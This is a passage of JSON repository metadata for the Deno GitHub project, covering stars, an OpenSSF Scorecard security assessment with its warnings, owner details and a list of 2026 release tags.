TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%